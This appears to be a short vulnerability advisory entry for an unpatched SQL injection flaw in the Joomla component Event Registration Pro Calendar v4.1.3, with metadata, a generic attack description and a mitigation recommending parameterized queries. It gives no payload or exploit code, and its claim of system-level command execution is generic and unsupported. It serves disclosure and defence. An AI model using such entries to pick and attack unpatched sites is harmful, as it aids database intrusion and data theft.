vendor: Event Registration Pro Calendar
by: Ihsan Sencan
CVSS: 8,8 HIGH
CWE: 89 (SQL Injection)
Product Name: Event Registration Pro Calendar
Affected Version From: 4.1.3
Affected Version To: 4.1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlashowroom:event_registration_pro_calendar:4.1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017
Joomla! Component Event Registration Pro Calendar v4.1.3 – SQL Injection
An attacker can exploit a SQL injection vulnerability in Joomla! Component Event Registration Pro Calendar v4.1.3 by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or execute system-level commands.
Mitigation:
Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This ensures that user-supplied input is bound as a data value and is never interpreted as part of the SQL query.